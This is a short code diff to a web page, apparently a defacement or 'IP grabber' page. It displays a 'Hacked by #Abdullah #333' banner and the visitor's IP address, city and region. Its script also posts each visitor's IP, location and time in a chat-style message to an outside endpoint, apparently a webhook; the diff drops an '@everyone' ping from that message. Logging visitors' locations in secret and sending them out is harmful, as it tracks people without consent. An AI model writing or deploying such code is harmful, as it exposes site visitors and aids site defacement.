--- a/index.html
+++ b/index.html
@@ -206,7 +206,7 @@
             const port = window.location.port || (location.protocol === 'https:' ? '443' : '80');
 
             const infoDiv = document.getElementById('ip-info');
-            infoDiv.innerHTML = ` Hack by #Abdullah
+            infoDiv.innerHTML = ` Hacked by #Abdullah #333
 <strong>IP:</strong><span>"${ip}"</span><br>
 <strong>City:</strong><span>"${city}"</span><br>
 <strong>Region:</strong><span>"${region}"</span><br>
@@ -225,7 +225,6 @@
                              `**IP:** \`${ip}\`\n` +
                              `**Location:** ${country} - ${city}\n` +
                              `**Time:** ${dateTime}`
-                             `**@everyone**` 
                 })
             });
         });
